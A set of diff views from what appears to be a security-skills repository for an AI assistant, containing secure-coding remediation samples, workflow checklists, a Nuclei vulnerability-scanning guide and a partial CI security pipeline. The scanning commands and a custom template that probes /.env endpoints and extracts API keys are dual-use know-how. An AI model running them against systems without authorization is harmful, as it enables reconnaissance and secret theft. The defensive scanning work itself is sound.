if not re.match(r'^\d+$', user_id):
raise ValueError("Invalid user ID format")
# Use ORM query builders
user = User.query.filter_by(id=user_id).first()
```
**Step 4: Implement least privilege**
- Database user should have minimum required permissions
- Use read-only accounts for SELECT operations
- Never use admin/root accounts for application queries
### XSS Remediation
**Step 1: Enable auto-escaping**
- Most modern frameworks escape by default
- Ensure auto-escaping is not disabled
**Step 2: Use framework-specific safe methods**
```javascript
// React: Use JSX (auto-escapes)
<div>{userInput}</div>
// Vue: Use template syntax (auto-escapes)
<div>{{ userInput }}</div>
// Angular: Use property binding (auto-escapes)
<div [textContent]="userInput"></div>
```
**Step 3: Sanitize when HTML is required**
```javascript
import DOMPurify from 'dompurify';
// Sanitize HTML content
const clean = DOMPurify.sanitize(userHTML, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],
ALLOWED_ATTR: []
});
```
**Step 4: Content Security Policy (CSP)**
```html
<!-- Add CSP header -->
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'
```
---
## Advanced Configuration
This section contains detailed configuration options and tuning parameters.
### Example: SAST Tool Configuration
```yaml
# Advanced security scanner configuration
scanner:
# Severity threshold
severity_threshold: MEDIUM
# Rule configuration
rules:
enabled:
- sql-injection
- xss
- hardcoded-secrets
disabled:
- informational-only
# False positive reduction
confidence_threshold: HIGH
exclude_patterns:
- "*/test/*"
- "*/tests/*"
- "*/node_modules/*"
- "*.test.js"
- "*.spec.ts"
# Performance tuning
max_file_size_kb: 2048
timeout_seconds: 300
parallel_jobs: 4
# Output configuration
output_format: json
include_code_snippets: true
max_snippet_lines: 10
```
---
## Examples and Code Samples
This section provides comprehensive code examples for various scenarios.
### Example 1: Secure API Authentication
```python
# Secure API key handling
import os
from functools import wraps
from flask import Flask, request, jsonify
app = Flask(__name__)
# Load API key from environment (never hardcode)
VALID_API_KEY = os.environ.get('API_KEY')
if not VALID_API_KEY:
raise ValueError("API_KEY environment variable not set")
def require_api_key(f):
@wraps(f)
def decorated_function(*args, **kwargs):
api_key = request.headers.get('X-API-Key')
if not api_key:
return jsonify({'error': 'API key required'}), 401
# Constant-time comparison to prevent timing attacks
import hmac
if not hmac.compare_digest(api_key, VALID_API_KEY):
return jsonify({'error': 'Invalid API key'}), 403
return f(*args, **kwargs)
return decorated_function
@app.route('/api/secure-endpoint')
@require_api_key
def secure_endpoint():
return jsonify({'message': 'Access granted'})
```
### Example 2: Secure Password Hashing
```python
# Secure password storage with bcrypt
import bcrypt
def hash_password(password: str) -> str:
"""Hash a password using bcrypt."""
# Generate salt and hash password
salt = bcrypt.gensalt(rounds=12) # Cost factor: 12 (industry standard)
hashed = bcrypt.hashpw(password.encode('utf-8'), salt)
return hashed.decode('utf-8')
def verify_password(password: str, hashed: str) -> bool:
"""Verify a password against a hash."""
return bcrypt.checkpw(
password.encode('utf-8'),
hashed.encode('utf-8')
)
# Usage
stored_hash = hash_password("user_password")
is_valid = verify_password("user_password", stored_hash) # True
```
### Example 3: Secure File Upload
```python
# Secure file upload with validation
import os
import magic
from werkzeug.utils import secure_filename
ALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg'}
ALLOWED_MIME_TYPES = {
'application/pdf',
'image/png',
'image/jpeg'
}
MAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB
def is_allowed_file(filename: str, file_content: bytes) -> bool:
"""Validate file extension and MIME type."""
# Check extension
if '.' not in filename:
return False
ext = filename.rsplit('.', 1)[1].lower()
if ext not in ALLOWED_EXTENSIONS:
return False
# Check MIME type (prevent extension spoofing)
mime = magic.from_buffer(file_content, mime=True)
if mime not in ALLOWED_MIME_TYPES:
return False
return True
def handle_upload(file):
"""Securely handle file upload."""
# Check file size
file.seek(0, os.SEEK_END)
size = file.tell()
file.seek(0)
if size > MAX_FILE_SIZE:
raise ValueError("File too large")
# Read content for validation
content = file.read()
file.seek(0)
# Validate file type
if not is_allowed_file(file.filename, content):
raise ValueError("Invalid file type")
# Sanitize filename
filename = secure_filename(file.filename)
# Generate unique filename to prevent overwrite attacks
import uuid
unique_filename = f"{uuid.uuid4()}_{filename}"
# Save to secure location (outside web root)
upload_path = os.path.join('/secure/uploads', unique_filename)
file.save(upload_path)
return unique_filename
```
---
## Best Practices for Reference Documents
1. **Start with "When to use"** - Help Claude know when to load this reference
2. **Include table of contents** - For documents >100 lines
3. **Use concrete examples** - Code samples with vulnerable and fixed versions
4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context
5. **Provide remediation** - Don't just identify issues, show how to fix them
6. **Organize logically** - Group related content, use clear headings
7. **Keep examples current** - Use modern patterns and current framework versions
8. **Be concise** - Even in references, challenge every sentence

View File

@@ -0,0 +1,253 @@
# Workflow Checklist Template
This template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.
## Pattern 1: Sequential Workflow Checklist
Use this pattern for operations that must be completed in order, step-by-step.
### Security Assessment Workflow
Progress:
[ ] 1. Identify application entry points and attack surface
[ ] 2. Map authentication and authorization flows
[ ] 3. Identify data flows and sensitive data handling
[ ] 4. Review existing security controls
[ ] 5. Document findings with framework references (OWASP, CWE)
[ ] 6. Prioritize findings by severity (CVSS scores)
[ ] 7. Generate report with remediation recommendations
Work through each step systematically. Check off completed items.
---
## Pattern 2: Conditional Workflow
Use this pattern when the workflow branches based on findings or conditions.
### Vulnerability Remediation Workflow
1. Identify vulnerability type
- If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)
- If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)
- If Authentication flaw → See [auth-remediation.md](auth-remediation.md)
- If Authorization flaw → See [authz-remediation.md](authz-remediation.md)
- If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)
2. Assess severity using CVSS calculator
- If CVSS >= 9.0 → Priority: Critical (immediate action)
- If CVSS 7.0-8.9 → Priority: High (action within 24h)
- If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)
- If CVSS < 4.0 → Priority: Low (action within 30 days)
3. Apply appropriate remediation pattern
4. Validate fix with security testing
5. Document changes and update security documentation
---
## Pattern 3: Iterative Workflow
Use this pattern for operations that repeat across multiple targets or items.
### Code Security Review Workflow
For each file in the review scope:
1. Identify security-sensitive operations (auth, data access, crypto, input handling)
2. Check against secure coding patterns for the language
3. Flag potential vulnerabilities with severity rating
4. Map findings to CWE and OWASP categories
5. Suggest specific remediation approaches
6. Document finding with code location and fix priority
Continue until all files in scope have been reviewed.
---
## Pattern 4: Feedback Loop Workflow
Use this pattern when validation and iteration are required.
### Secure Configuration Generation Workflow
1. Generate initial security configuration based on requirements
2. Run validation script: `./scripts/validate_config.py config.yaml`
3. Review validation output:
- Note all errors (must fix)
- Note all warnings (should fix)
- Note all info items (consider)
4. Fix identified issues in configuration
5. Repeat steps 2-4 until validation passes with zero errors
6. Review warnings and determine if they should be addressed
7. Apply configuration once validation is clean
**Validation Loop**: Run validator → Fix errors → Repeat until clean
---
## Pattern 5: Parallel Analysis Workflow
Use this pattern when multiple independent analyses can run concurrently.
### Comprehensive Security Scan Workflow
Run these scans in parallel:
**Static Analysis**:
[ ] 1a. Run SAST scan (Semgrep/Bandit)
[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)
[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)
[ ] 1d. Run license compliance check
**Dynamic Analysis**:
[ ] 2a. Run DAST scan (ZAP/Burp)
[ ] 2b. Run API security testing
[ ] 2c. Run authentication/authorization testing
**Infrastructure Analysis**:
[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)
[ ] 3b. Run container image scan (Trivy/Grype)
[ ] 3c. Run configuration review
**Consolidation**:
[ ] 4. Aggregate all findings
[ ] 5. Deduplicate and correlate findings
[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)
[ ] 7. Generate unified security report
---
## Pattern 6: Research and Documentation Workflow
Use this pattern for security research and documentation tasks.
### Threat Modeling Workflow
Research Progress:
[ ] 1. Identify system components and boundaries
[ ] 2. Map data flows between components
[ ] 3. Identify trust boundaries
[ ] 4. Enumerate assets (data, services, credentials)
[ ] 5. Apply STRIDE framework to each component:
- Spoofing threats
- Tampering threats
- Repudiation threats
- Information disclosure threats
- Denial of service threats
- Elevation of privilege threats
[ ] 6. Map threats to MITRE ATT&CK techniques
[ ] 7. Identify existing mitigations
[ ] 8. Document residual risks
[ ] 9. Recommend additional security controls
[ ] 10. Generate threat model document
Work through each step systematically. Check off completed items.
---
## Pattern 7: Compliance Validation Workflow
Use this pattern for compliance checks against security standards.
### Security Compliance Audit Workflow
**SOC 2 Controls Review**:
[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)
[ ] 2. Verify logical access controls implementation (CC6.1)
[ ] 3. Review authentication mechanisms (CC6.1)
[ ] 4. Verify encryption implementation (CC6.1, CC6.7)
[ ] 5. Review audit logging configuration (CC7.2)
[ ] 6. Verify security monitoring (CC7.2, CC7.3)
[ ] 7. Review incident response procedures (CC7.3, CC7.4)
[ ] 8. Verify backup and recovery processes (A1.2, A1.3)
**Evidence Collection**:
[ ] 9. Collect policy documents
[ ] 10. Collect configuration screenshots
[ ] 11. Collect audit logs
[ ] 12. Document control gaps
[ ] 13. Generate compliance report
---
## Pattern 8: Incident Response Workflow
Use this pattern for security incident handling.
### Security Incident Response Workflow
**Detection and Analysis**:
[ ] 1. Confirm security incident (rule out false positive)
[ ] 2. Determine incident severity (SEV1/2/3/4)
[ ] 3. Identify affected systems and data
[ ] 4. Preserve evidence (logs, memory dumps, network captures)
**Containment**:
[ ] 5. Isolate affected systems (network segmentation)
[ ] 6. Disable compromised accounts
[ ] 7. Block malicious indicators (IPs, domains, hashes)
[ ] 8. Implement temporary compensating controls
**Eradication**:
[ ] 9. Identify root cause
[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)
[ ] 11. Patch vulnerabilities exploited
[ ] 12. Reset compromised credentials
**Recovery**:
[ ] 13. Restore systems from clean backups (if needed)
[ ] 14. Re-enable systems with monitoring
[ ] 15. Verify system integrity
[ ] 16. Resume normal operations
**Post-Incident**:
[ ] 17. Document incident timeline
[ ] 18. Identify lessons learned
[ ] 19. Update security controls to prevent recurrence
[ ] 20. Update incident response procedures
[ ] 21. Communicate with stakeholders
---
## Usage Guidelines
### When to Use Workflow Checklists
**Use checklists for**:
- Complex multi-step operations
- Operations requiring specific order
- Security assessments and audits
- Incident response procedures
- Compliance validation tasks
**Don't use checklists for**:
- Simple single-step operations
- Highly dynamic exploratory work
- Operations that vary significantly each time
### Adapting This Template
1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file
2. **Customize steps** to match your specific security tool or process
3. **Add framework references** (OWASP, CWE, NIST) where applicable
4. **Include tool-specific commands** for automation
5. **Add decision points** where manual judgment is required
### Checklist Best Practices
- **Be specific**: "Run semgrep --config=auto ." not "Scan the code"
- **Include success criteria**: "Validation passes with 0 errors"
- **Reference standards**: Link to OWASP, CWE, NIST where relevant
- **Show progress**: Checkbox format helps track completion
- **Provide escape hatches**: "If validation fails, see troubleshooting.md"
### Integration with Feedback Loops
Combine checklists with validation scripts for maximum effectiveness:
1. Create checklist for the workflow
2. Provide validation script that checks quality
3. Include "run validator" step in checklist
4. Loop: Complete step → Validate → Fix issues → Re-validate
This pattern dramatically improves output quality through systematic validation.

View File

@@ -0,0 +1,510 @@
---
name: dast-nuclei
description: >
Fast, template-based vulnerability scanning using ProjectDiscovery's Nuclei with extensive community
templates covering CVEs, OWASP Top 10, misconfigurations, and security issues across web applications,
APIs, and infrastructure. Use when: (1) Performing rapid vulnerability scanning with automated CVE
detection, (2) Testing for known vulnerabilities and security misconfigurations in web apps and APIs,
(3) Running template-based security checks in CI/CD pipelines with customizable severity thresholds,
(4) Creating custom security templates for organization-specific vulnerability patterns, (5) Scanning
multiple targets efficiently with concurrent execution and rate limiting controls.
version: 0.1.0
maintainer: SirAppSec
category: appsec
tags: [dast, nuclei, vulnerability-scanning, cve, owasp, api-testing, automation, templates]
frameworks: [OWASP, CWE, CVE]
dependencies:
tools: [nuclei]
optional: [docker, git]
references:
- https://docs.projectdiscovery.io/tools/nuclei/overview
- https://github.com/projectdiscovery/nuclei
- https://github.com/projectdiscovery/nuclei-templates
---
# DAST with Nuclei
## Overview
Nuclei is a fast, template-based vulnerability scanner from ProjectDiscovery that uses YAML templates to detect
security vulnerabilities, misconfigurations, and exposures across web applications, APIs, networks, and cloud
infrastructure. With 7,000+ community templates covering CVEs, OWASP vulnerabilities, and custom checks, Nuclei
provides efficient automated security testing with minimal false positives.
## Quick Start
### Installation
```bash
# Install via Go
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# Or using Docker
docker pull projectdiscovery/nuclei:latest
# Update templates (automatically downloads 7000+ community templates)
nuclei -update-templates
```
### Basic Vulnerability Scan
```bash
# Scan single target with all templates
nuclei -u https://target-app.com
# Scan with specific severity levels
nuclei -u https://target-app.com -severity critical,high
# Scan multiple targets from file
nuclei -list targets.txt -severity critical,high,medium -o results.txt
```
### Quick CVE Scan
```bash
# Scan for specific CVEs
nuclei -u https://target-app.com -tags cve -severity critical,high
# Scan for recent CVEs
nuclei -u https://target-app.com -tags cve -severity critical -template-condition "contains(id, 'CVE-')"
```
## Core Workflow
### Workflow Checklist
Progress:
[ ] 1. Install Nuclei and update templates to latest version
[ ] 2. Define target scope (URLs, domains, IP ranges)
[ ] 3. Select appropriate templates based on target type and risk tolerance
[ ] 4. Configure scan parameters (rate limiting, severity, concurrency)
[ ] 5. Execute scan with proper authentication if needed
[ ] 6. Review findings, filter false positives, and verify vulnerabilities
[ ] 7. Map findings to OWASP/CWE frameworks
[ ] 8. Generate security report with remediation guidance
Work through each step systematically. Check off completed items.
### Step 1: Template Selection and Target Scoping
Identify target applications and select relevant template categories:
```bash
# List available template categories
nuclei -tl
# List templates by tag
nuclei -tl -tags owasp
nuclei -tl -tags cve,misconfig
# Show template statistics
nuclei -tl -tags cve -severity critical | wc -l
```
**Template Categories:**
- **cve**: Known CVE vulnerabilities (7000+ CVE templates)
- **owasp**: OWASP Top 10 vulnerabilities
- **misconfig**: Common security misconfigurations
- **exposed-panels**: Admin panels and login pages
- **takeovers**: Subdomain takeover vulnerabilities
- **default-logins**: Default credentials
- **exposures**: Sensitive file and data exposures
- **tech**: Technology detection and fingerprinting
**Target Scoping Best Practices:**
- Create target list excluding third-party services
- Group targets by application type for focused scanning
- Define exclusions for sensitive endpoints (payment, logout, delete actions)
### Step 2: Configure Scan Parameters
Set appropriate rate limiting and concurrency for target environment:
```bash
# Conservative scan (avoid overwhelming target)
nuclei -u https://target-app.com \
-severity critical,high \
-rate-limit 50 \
-concurrency 10 \
-timeout 10
# Aggressive scan (faster, higher load)
nuclei -u https://target-app.com \
-severity critical,high,medium \
-rate-limit 150 \
-concurrency 25 \
-bulk-size 25
```
**Parameter Guidelines:**
- **rate-limit**: Requests per second (50-150 typical, lower for production)
- **concurrency**: Parallel template execution (10-25 typical)
- **bulk-size**: Parallel host scanning (10-25 for multiple targets)
- **timeout**: Per-request timeout in seconds (10-30 typical)
For CI/CD integration patterns, see `scripts/nuclei_ci.sh`.
### Step 3: Execute Targeted Scans
Run scans based on security objectives:
**Critical Vulnerability Scan:**
```bash
# Focus on critical and high severity issues
nuclei -u https://target-app.com \
-severity critical,high \
-tags cve,owasp \
-o critical-findings.txt \
-json -jsonl-export critical-findings.jsonl
```
**Technology-Specific Scan:**
```bash
# Scan specific technology stack
nuclei -u https://target-app.com -tags apache,nginx,wordpress,drupal
# Scan for exposed sensitive files
nuclei -u https://target-app.com -tags exposure,config
# Scan for authentication issues
nuclei -u https://target-app.com -tags auth,login,default-logins
```
**API Security Scan:**
```bash
# API-focused security testing
nuclei -u https://api.target.com \
-tags api,graphql,swagger \
-severity critical,high,medium \
-header "Authorization: Bearer $API_TOKEN"
```
**Custom Template Scan:**
```bash
# Scan with organization-specific templates
nuclei -u https://target-app.com \
-t custom-templates/ \
-t nuclei-templates/http/cves/ \
-severity critical,high
```
### Step 4: Authenticated Scanning
Perform authenticated scans for complete coverage:
```bash
# Scan with authentication headers
nuclei -u https://target-app.com \
-header "Authorization: Bearer $AUTH_TOKEN" \
-header "Cookie: session=$SESSION_COOKIE" \
-tags cve,owasp
# Scan with custom authentication using bundled script
python3 scripts/nuclei_auth_scan.py \
--target https://target-app.com \
--auth-type bearer \
--token-env AUTH_TOKEN \
--severity critical,high \
--output auth-scan-results.jsonl
```
For OAuth, SAML, and MFA scenarios, see `references/authentication_patterns.md`.
### Step 5: Results Analysis and Validation
Review findings and eliminate false positives:
```bash
# Parse JSON output for high-level summary
python3 scripts/parse_nuclei_results.py \
--input critical-findings.jsonl \
--output report.html \
--group-by severity
# Filter and verify findings
nuclei -u https://target-app.com \
-tags cve \
-severity critical \
-verify \
-verbose
```
**Validation Workflow:**
1. Review critical findings first (immediate action required)
2. Verify each finding manually (curl, browser inspection, PoC testing)
3. Check for false positives using `references/false_positive_guide.md`
4. Map confirmed vulnerabilities to OWASP Top 10 using `references/owasp_mapping.md`
5. Cross-reference with CWE classifications for remediation patterns
**Feedback Loop Pattern:**
```bash
# 1. Initial scan
nuclei -u https://target-app.com -severity critical,high -o scan1.txt
# 2. Apply fixes to identified vulnerabilities
# 3. Re-scan to verify remediation
nuclei -u https://target-app.com -severity critical,high -o scan2.txt
# 4. Compare results to ensure vulnerabilities are resolved
diff scan1.txt scan2.txt
```
### Step 6: Reporting and Remediation Tracking
Generate comprehensive security reports:
```bash
# Generate detailed report with OWASP/CWE mappings
python3 scripts/nuclei_report_generator.py \
--input scan-results.jsonl \
--output security-report.html \
--format html \
--include-remediation \
--map-frameworks owasp,cwe
# Export to SARIF for GitHub Security tab
nuclei -u https://target-app.com \
-severity critical,high \
-sarif-export github-sarif.json
```
See `assets/report_templates/` for customizable report formats.
## Automation & CI/CD Integration
### GitHub Actions Integration
```yaml
# .github/workflows/nuclei-scan.yml
name: Nuclei Security Scan
on: [push, pull_request]
jobs:
nuclei:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Nuclei Scan
uses: projectdiscovery/nuclei-action@main
with:
target: https://staging.target-app.com
severity: critical,high
templates: cves,owasp,misconfig
- name: Upload Results
uses: github/codeql-action/upload-sarif@v2
with:
sarif_file: nuclei.sarif
```
### Docker-Based CI/CD Scanning
```bash
# Run in CI/CD pipeline with Docker
docker run --rm \
-v $(pwd):/reports \
projectdiscovery/nuclei:latest \
-u $TARGET_URL \
-severity critical,high \
-json -jsonl-export /reports/nuclei-results.jsonl
# Check exit code and fail build on critical findings
if grep -q '"severity":"critical"' nuclei-results.jsonl; then
echo "Critical vulnerabilities detected!"
exit 1
fi
```
### Advanced Automation with Custom Scripts
```bash
# Automated multi-target scanning with parallel execution
./scripts/nuclei_bulk_scanner.sh \
--targets-file production-apps.txt \
--severity critical,high \
--slack-webhook $SLACK_WEBHOOK \
--output-dir scan-reports/
# Scheduled vulnerability monitoring
./scripts/nuclei_scheduler.sh \
--schedule daily \
--targets targets.txt \
--diff-mode \
--alert-on new-findings
```
For complete CI/CD integration examples, see `scripts/ci_integration_examples/`.
## Custom Template Development
Create organization-specific security templates:
```yaml
# custom-templates/api-key-exposure.yaml
id: custom-api-key-exposure
info:
name: Custom API Key Exposure Check
author: security-team
severity: high
description: Detects exposed API keys in custom application endpoints
tags: api,exposure,custom
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/config"
- "{{BaseURL}}/.env"
matchers-condition: and
matchers:
- type: word
words:
- "api_key"
- "secret_key"
- type: status
status:
- 200
extractors:
- type: regex
name: api_key
regex:
- 'api_key["\s:=]+([a-zA-Z0-9_-]{32,})'
```
**Template Development Resources:**
- `references/template_development.md` - Complete template authoring guide
- `assets/template_examples/` - Sample templates for common patterns
- [Nuclei Template Guide](https://docs.projectdiscovery.io/templates/introduction)
## Security Considerations
- **Authorization**: Obtain explicit written permission before scanning any systems not owned by your organization
- **Rate Limiting**: Configure appropriate rate limits to avoid overwhelming target applications or triggering DDoS protections
- **Production Safety**: Use conservative scan parameters (rate-limit 50, concurrency 10) for production environments
- **Sensitive Data**: Scan results may contain sensitive URLs, parameters, and application details - sanitize before sharing
- **False Positives**: Manually verify all critical and high severity findings before raising security incidents
- **Access Control**: Restrict access to scan results and templates containing organization-specific vulnerability patterns
- **Audit Logging**: Log all scan executions, targets, findings severity, and remediation actions for compliance
- **Legal Compliance**: Adhere to computer fraud and abuse laws; unauthorized scanning may violate laws
- **Credentials Management**: Never hardcode credentials in templates; use environment variables or secrets management
- **Scope Validation**: Double-check target lists to avoid scanning third-party or out-of-scope systems
## Bundled Resources
### Scripts (`scripts/`)
- `nuclei_ci.sh` - CI/CD integration wrapper with exit code handling and artifact generation
- `nuclei_auth_scan.py` - Authenticated scanning with multiple authentication methods (Bearer, API key, Cookie)
- `nuclei_bulk_scanner.sh` - Parallel scanning of multiple targets with aggregated reporting
- `nuclei_scheduler.sh` - Scheduled scanning with diff detection and alerting
- `parse_nuclei_results.py` - JSON/JSONL parser for generating HTML/CSV reports with severity grouping
- `nuclei_report_generator.py` - Comprehensive report generator with OWASP/CWE mappings and remediation guidance
- `template_validator.py` - Custom template validation and testing framework
### References (`references/`)
- `owasp_mapping.md` - OWASP Top 10 mapping for Nuclei findings
- `template_development.md` - Custom template authoring guide
- `authentication_patterns.md` - Advanced authentication patterns (OAuth, SAML, MFA)
- `false_positive_guide.md` - False positive identification and handling
### Assets (`assets/`)
- `github_actions.yml` - GitHub Actions workflow with SARIF export
- `nuclei_config.yaml` - Comprehensive configuration template
## Common Patterns
### Pattern 1: Progressive Severity Scanning
Start with critical vulnerabilities and progressively expand scope:
```bash
# Stage 1: Critical vulnerabilities only (fast)
nuclei -u https://target-app.com -severity critical -o critical.txt
# Stage 2: High severity if critical issues found
if [ -s critical.txt ]; then
nuclei -u https://target-app.com -severity high -o high.txt
fi
# Stage 3: Medium/Low for comprehensive assessment
nuclei -u https://target-app.com -severity medium,low -o all-findings.txt
```
### Pattern 2: Technology-Specific Scanning
Focus on known technology stack vulnerabilities:
```bash
# 1. Identify technologies
nuclei -u https://target-app.com -tags tech -o tech-detected.txt
# 2. Parse detected technologies
TECHS=$(grep -oP 'matched at \K\w+' tech-detected.txt | sort -u)
# 3. Scan for technology-specific vulnerabilities
for tech in $TECHS; do
nuclei -u https://target-app.com -tags $tech -severity critical,high -o vulns-$tech.txt
done
```
### Pattern 3: Multi-Stage API Security Testing
Comprehensive API security assessment:
```bash
# Stage 1: API discovery and fingerprinting
nuclei -u https://api.target.com -tags api,swagger,graphql -o api-discovery.txt
# Stage 2: Authentication testing
nuclei -u https://api.target.com -tags auth,jwt,oauth -o api-auth.txt
# Stage 3: Known API CVEs
nuclei -u https://api.target.com -tags api,cve -severity critical,high -o api-cves.txt
# Stage 4: Business logic testing with custom templates
nuclei -u https://api.target.com -t custom-templates/api/ -o api-custom.txt
```
### Pattern 4: Continuous Security Monitoring
```bash
# Daily scan with diff detection
nuclei -u https://production-app.com \
-severity critical,high -tags cve \
-json -jsonl-export scan-$(date +%Y%m%d).jsonl
# Use bundled scripts for diff analysis and alerting
```
## Integration Points
- **CI/CD**: GitHub Actions, GitLab CI, Jenkins, CircleCI, Azure DevOps, Travis CI
- **Issue Tracking**: Jira, GitHub Issues, ServiceNow, Linear (via SARIF or custom scripts)
- **Security Platforms**: Defect Dojo, Splunk, ELK Stack, SIEM platforms (via JSON export)
- **Notification**: Slack, Microsoft Teams, Discord, PagerDuty, email (via webhook scripts)
- **SDLC**: Pre-deployment scanning, security regression testing, vulnerability monitoring
- **Cloud Platforms**: AWS Lambda, Google Cloud Functions, Azure Functions (serverless scanning)
- **Reporting**: HTML, JSON, JSONL, SARIF, Markdown, CSV formats
## Troubleshooting
Common issues and solutions:
- **Too Many False Positives**: Filter by severity (`-severity critical,high`), exclude tags (`-etags tech,info`). See `references/false_positive_guide.md`
- **Incomplete Coverage**: Verify templates loaded (`nuclei -tl | wc -l`), update templates (`nuclei -update-templates`)
- **Rate Limiting/WAF**: Reduce aggressiveness (`-rate-limit 20 -concurrency 5 -timeout 15`)
- **High Resource Usage**: Reduce parallelism (`-concurrency 5 -bulk-size 5`)
- **Auth Headers Not Working**: Debug with `-debug`, verify token format, see `references/authentication_patterns.md`
## References
- [Nuclei Documentation](https://docs.projectdiscovery.io/tools/nuclei/overview)
- [Nuclei Templates Repository](https://github.com/projectdiscovery/nuclei-templates)
- [OWASP Top 10](https://owasp.org/Top10/)
- [CWE Database](https://cwe.mitre.org/)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,357 @@
# Security-Enhanced CI/CD Pipeline Template
#
# This template demonstrates security best practices for CI/CD pipelines.
# Adapt this template to your specific security tool and workflow needs.
#
# Key Security Features:
# - SAST (Static Application Security Testing)
# - Dependency vulnerability scanning
# - Secrets detection
# - Infrastructure-as-Code security scanning
# - Container image scanning
# - Security artifact uploading for compliance
name: Security Scan Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main, develop]
schedule:
# Run weekly security scans on Sunday at 2 AM UTC
- cron: '0 2 * * 0'
workflow_dispatch: # Allow manual trigger
# Security: Restrict permissions to minimum required
permissions:
contents: read
security-events: write # For uploading SARIF results
pull-requests: write # For commenting on PRs
env:
# Configuration
SECURITY_SCAN_FAIL_ON: 'critical,high' # Fail build on these severities
REPORT_DIR: 'security-reports'
jobs:
# Job 1: Static Application Security Testing (SAST)
sast-scan:
name: SAST Security Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history for better analysis
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Run SAST Scanner
run: |
# Example: Using Semgrep for SAST
pip install semgrep
semgrep --config=auto \
--json \
--output ${{ env.REPORT_DIR }}/sast-results.json \
. || true
# Alternative: Bandit for Python projects
# pip install bandit
# bandit -r . -f json -o ${{ env.REPORT_DIR }}/bandit-results.json
- name: Process SAST Results
run: |
# Parse results and fail on critical/high severity
python3 -c "
import json
import sys
with open('${{ env.REPORT_DIR }}/sast-results.json') as f:
results = json.load(f)
critical = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'ERROR'])
high = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'WARNING'])
print(f'Critical findings: {critical}')
print(f'High findings: {high}')
if critical > 0:
print('❌ Build failed: Critical security issues found')
sys.exit(1)
elif high > 0:
print('⚠️ Warning: High severity issues found')
# Optionally fail on high severity
# sys.exit(1)
else:
print('✅ No critical security issues found')
"
- name: Upload SAST Results
if: always()
uses: actions/upload-artifact@v4
with:
name: sast-results
path: ${{ env.REPORT_DIR }}/sast-results.json
retention-days: 30
# Job 2: Dependency Vulnerability Scanning
dependency-scan:
name: Dependency Vulnerability Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Scan Python Dependencies
if: hashFiles('requirements.txt') != ''
run: |
pip install safety
safety check \
--json \
--output ${{ env.REPORT_DIR }}/safety-results.json \
|| true
- name: Scan Node Dependencies
if: hashFiles('package.json') != ''
run: |
npm audit --json > ${{ env.REPORT_DIR }}/npm-audit.json || true
- name: Process Dependency Results
run: |
# Check for critical vulnerabilities
if [ -f "${{ env.REPORT_DIR }}/safety-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/safety-results.json')); print(len([v for v in data.get('vulnerabilities', []) if v.get('severity', '').lower() == 'critical']))")
echo "Critical vulnerabilities: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "❌ Build failed: Critical vulnerabilities in dependencies"
exit 1
fi
fi
- name: Upload Dependency Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: dependency-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 3: Secrets Detection
secrets-scan:
name: Secrets Detection
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history to scan all commits
- name: Run Gitleaks
uses: gitleaks/gitleaks-action@v2
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
GITLEAKS_ENABLE_SUMMARY: true
- name: Alternative - TruffleHog Scan
if: false # Set to true to enable
run: |
pip install truffleHog
trufflehog --json --regex --entropy=True . \
> ${{ env.REPORT_DIR }}/trufflehog-results.json || true
- name: Upload Secrets Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: secrets-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 4: Container Image Scanning
container-scan:
name: Container Image Security Scan
runs-on: ubuntu-latest
if: hashFiles('Dockerfile') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Build Docker Image
run: |
docker build -t app:${{ github.sha }} .
- name: Run Trivy Scanner
uses: aquasecurity/trivy-action@master
with:
image-ref: app:${{ github.sha }}
format: 'sarif'
output: '${{ env.REPORT_DIR }}/trivy-results.sarif'
severity: 'CRITICAL,HIGH'
- name: Upload Trivy Results to GitHub Security
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: '${{ env.REPORT_DIR }}/trivy-results.sarif'
- name: Upload Container Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: container-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 5: Infrastructure-as-Code Security Scanning
iac-scan:
name: IaC Security Scan
runs-on: ubuntu-latest
if: hashFiles('**/*.tf', '**/*.yaml', '**/*.yml') != ''
steps:
- name: Checkout code
